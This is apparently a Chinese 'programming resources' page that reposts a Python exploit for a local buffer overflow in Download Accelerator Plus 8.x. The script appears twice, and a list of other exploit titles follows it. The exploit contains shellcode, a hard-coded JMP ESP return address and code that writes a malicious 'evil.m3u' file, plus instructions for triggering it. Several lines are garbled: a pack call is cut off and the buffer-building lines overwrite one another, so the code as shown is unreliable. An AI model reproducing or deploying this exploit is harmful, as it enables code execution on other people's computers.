您现在的位置是:网站首页> 编程资料编程资料
Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day _Exploit_网络安全_
2023-05-24
417人已围观
简介 Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day _Exploit_网络安全_
#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
m3u = 'http://localhost/verify_me________________________________%s.mp3'
buf = 'A' * 14074
buf = pack(' buf = '\x90' * 32
buf = shellcode
m3u %= buf
fd = open('evil.m3u', 'wb')
fd.write(m3u)
fd.close()
print 'DONE, import the evil.m3u and click "Verify"'
# EoF
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
m3u = 'http://localhost/verify_me________________________________%s.mp3'
buf = 'A' * 14074
buf = pack('
buf = shellcode
m3u %= buf
fd = open('evil.m3u', 'wb')
fd.write(m3u)
fd.close()
print 'DONE, import the evil.m3u and click "Verify"'
# EoF
相关内容
- OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC _Exploit_网络安全_
- Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c) _Exploit_网络安全_
- Poppler _Exploit_网络安全_
- Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit _Exploit_网络安全_
- Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit _Exploit_网络安全_
- minb 0.1.0 Remote Code Execution Exploit _Exploit_网络安全_
- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC _Exploit_网络安全_
- Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit _Exploit_网络安全_
- phsBlog 0.2 Bypass SQL Injection Filtering Exploit _Exploit_网络安全_
- Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit _Exploit_网络安全_
